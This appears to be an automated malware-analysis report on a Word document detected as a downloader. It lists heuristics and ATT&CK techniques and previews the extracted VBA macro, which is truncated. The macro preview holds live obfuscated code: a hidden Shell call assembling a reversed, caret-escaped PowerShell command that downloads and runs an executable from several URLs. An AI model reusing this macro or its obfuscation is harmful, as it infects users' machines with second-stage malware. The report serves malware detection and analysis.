MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute an external command. ClamAV detection as 'Doc.Downloader.Valyria-6680505-0' further confirms its malicious nature as a downloader. The script's obfuscated nature and the use of Shell() strongly suggest it's designed to download and execute a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Valyria-6680505-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6680505-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6373 bytes |
SHA-256: 4b55b674e9643e6c959618ac87cc1416be2acebcd1a15695030bcbba6e46797d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LCQvfljRadzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month CStr("4299" + "1015" + "344739718" + "fw")
Month CStr("494632986" + "m" + "XsFkqi" + "wiFl")
Month CStr("302754387" + "8047" + "fC" + "aQoAurBml")
Month CStr("3945" + "384305426")
Shell CStr(RiJIkbJQwQQG) + CStr(UolhuRLLLP) + mimliu + DcjVIjjr + MiCwECkcF + CStr(uoTkiSit) + CStr(FDVFTtQ), CStr(vbHide)
Month CStr("HTXAcFChTCzFj" + "ERWwHXNXDHLiz")
Month CStr("zIHijPQotHdvlJ" + "JUh")
Month CStr("7566" + "234288499")
Month CStr("sVwPOn" + "or" + "jlLrTwVHQ" + "74008461")
End Sub
Attribute VB_Name = "hEcrcMMoNMqHzl"
Function mimliu()
On _
Error _
Resume _
Next
Month CStr("udYQatkGGNcP" + "dwib" + "505" + "4462")
Month CStr("8532" + "l" + "4573" + "UMRmihQtItpwMW")
Month CStr("371611646" + "9431" + "37462952" + "510133015")
Month CStr("6" + "MfuL")
Month CStr("jktHwS" + "599" + "iLMAHJ" + "6651")
mDGUEi = Chr(4 + 2 + 3 + 13 + 77) + "md " + "/V" + "/" + Chr(3 + 1 + 2 + 9 + 52) + Chr(1 + 0 + 1 + 4 + 28) + "^s" + "^e^t " + "^5" + "^7TU= " + " "
Month CStr("ZPouGKwWL" + "122672491")
Month CStr("WsECcOnYp" + "wpRQOI" + "UXbbLfRFBDf" + "HUiw")
Month CStr("CZWnLF" + "RYO" + "8841" + "5290")
wlRuLiU = " ^" + " ^ " + "^ ^ ^ " + "^ ^ " + "^ " + "^ " + "^ " + "^}^}{" + "h" + Chr(4 + 2 + 3 + 13 + 77) + "t^a" + Chr(4 + 2 + 3 + 13 + 77) + "^}^;k^a"
Month CStr("R" + "k" + "6875" + "YhsSUwzuT")
Month CStr("ws" + "3405" + "24280871" + "KZfJwH")
Month CStr("bLIbhNTsj" + "MjRhLWPtHCRDdP" + "NO" + "435584444")
Month CStr("8596" + "NIpmZMAwk" + "LuuRdDFcZz" + "112415873")
UYjhQuBFw = "er^b" + ";NWB^" + "$ " + "^me^t" + "I^-^" + "ek^o" + "vn" + "I^;)N" + "^W^B^$" + " ," + "n^PF" + "^"
Month CStr("8320" + "470979074")
Month CStr("M" + "k")
Month CStr("306108299" + "322285141")
CZfkvVn = "$" + "(" + "^e^l" + "^i^" + "Fd^a^ol" + "n^woD.^" + "w^S" + "^" + "I" + "${^yr"
Month CStr("5374" + "kBtoSESP")
Month CStr("1435" + "Awph")
bKvWVnbG = "^t^{" + ")w" + "z^" + "j^$ n^i" + " " + "n^P^F^$" + "(^h" + Chr(4 + 2 + 3 + 13 + 77) + "^a^" + "ero^f" + ";"
Month CStr("cZlClYD" + "383556653")
Month CStr("Q" + "320568444")
Month CStr("o" + "c" + "Ic" + "lh")
Month CStr("jJiXM" + "399402295" + "luwjrUMujMXnLf" + "zljT")
dFmFVp = "^'e" + "x^e.^'^" + "+o" + "^Mr^" + "$^+'^" + "\^'^+"
mimliu = mDGUEi + wlRuLiU + UYjhQuBFw + CZfkvVn + bKvWVnbG + dFmFVp
Month CStr("vNmX" + "hPNYPkwWA" + "2369" + "3350")
Month CStr("Oj" + "uCSjhMNjmOVDJ")
Month CStr("XwDiNJVMiG" + "415465976" + "8710" + "457062183")
End Function
Function DcjVIjjr()
On _
Error _
Resume _
Next
Month CStr("5930" + "XjvfS")
Month CStr("DQlYKORUrFLLa" + "486001006" + "YaTBdVzn" + "qlUtAJWLpKIMHz")
Month CStr("692" + "5833" + "atqlFzsU" + "7021")
Month CStr("151698440" + "f")
FcGuwWmuZNi = Chr(4 + 2 + 3 + 13 + 77) + "i^l^" + "bu^p^:v" + "n^e^$" + "^=N" + "W" + "^B$;" + "^'0^" + "9^7' " + "^"
Month CStr("H" + "njjPTzMffr")
Month CStr("304285060" + "WARiRcwjYOQAQ")
Month CStr("8402" + "wP" + "377075714" + "vmpUQL")
HYTtiZ = "=^ o^" + "Mr$;)" + "'@^'(ti" + "lp^S.^'" + "^k^" + "W/^k" + "^d" + "^.^xe^" + "lfn^i^" + "m^da//" + "^:" + "ptth^@" + Chr(3 + 1 + 2 + 9 + 52)
Month CStr("9343" + "t" + "drTwpMwn" + "k")
Month CStr("821" + "S" + "fP" + "l")
Month CStr("qXS" + "JOB" + "331790607" + "uC")
zqGBMmd = "^z15" + "xF^z/" + "y^m." + "^m^" + "o" + Chr(4 + 2 + 3 + 13 + 77) + ".^a" + "^" + "t^" + "i" + "na" + "^m^a//:"
Month CStr("chdbY" + "F" + "daLAoXthfA" + "2779")
MwfWKpjj = "p^tth" + "@4n^Ig/" + "or^.^s" + "^e^" + "diu^gse" + "ru^ma" + "r^am/" + "/" + "^:"
Month CStr("tbHIj" + "jjlQVrIOqo" + "lC" + "157678031")
Month CStr("120540778" + "ZBsJqJjI")
Month CStr("i" + "WS")
Month CStr(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.